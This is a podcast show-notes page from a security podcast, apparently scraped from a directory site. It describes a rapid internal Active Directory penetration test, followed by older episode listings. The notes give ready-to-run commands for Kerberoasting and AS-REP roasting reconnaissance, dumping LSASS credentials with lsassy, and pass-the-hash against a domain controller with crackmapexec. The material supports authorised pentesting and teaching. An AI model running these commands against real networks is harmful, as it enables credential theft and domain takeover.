7MS #457: Tales of Internal Network Pentest Pwnage - Part 25
7 Minute Security4 Maalis 2021

7MS #457: Tales of Internal Network Pentest Pwnage - Part 25

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

  • Get a cmd.exe spun up in the context of your AD user account:
runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

Then get some important info in PowerView:

  • Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!

  • Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!

  • Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

Once you know where you have local admin access, lsassy is your friend:

  • lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

Did you get an admin's NTLM hash from this dump? Then do this:

  • crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

(Pwn3d!) FTW!

Jaksot(684)

7MS #243: ZOMG Logo Design Contest!

7MS #243: ZOMG Logo Design Contest!

Here are today's show notes!

2 Helmi 20179min

7MS #242: Bye Bye Dream Job - Part 4

7MS #242: Bye Bye Dream Job - Part 4

We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes): Webapp pentest tool bake-off In the next week I'll be evaluating the following for a more general/automatic Webapp scans: Netsparker HP WebInspect Qualys AppSpider SIEM comparison We're looking at several tools to do both on-prem and managed SIEM solutions. If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!

26 Tammi 201710min

7MS #241: Bye Bye Dream Job - Part 3

7MS #241: Bye Bye Dream Job - Part 3

Show notes are here

19 Tammi 201713min

7MS #240: Bye Bye Dream Job - Part 2

7MS #240: Bye Bye Dream Job - Part 2

Show notes are here.

12 Tammi 201712min

7MS #239: Bye Bye Dream Job - Part 1

7MS #239: Bye Bye Dream Job - Part 1

Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1

5 Tammi 20179min

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary

Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary

30 Marras 20168min

7MS #237: Network Monitoring 101 - Part 1: Nessus

7MS #237: Network Monitoring 101 - Part 1: Nessus

Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus

23 Marras 20168min

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

7MS #236: From "Derp!" to Domain Admin with MOVEit Central

Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central

17 Marras 201611min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
aikalisa
ootsa-kuullut-tasta-2
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
politiikan-puskaradio
aihe
rss-vaalirankkurit-podcast
rikosmyytit
the-ulkopolitist
rss-kovin-paikka
linda-maria
rss-mina-ukkola
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
radio-antro
rss-aijat-hopottaa-podcast
rss-kaikki-uusiksi
rss-hyvaa-huomenta-bryssel
rss-kyselytunti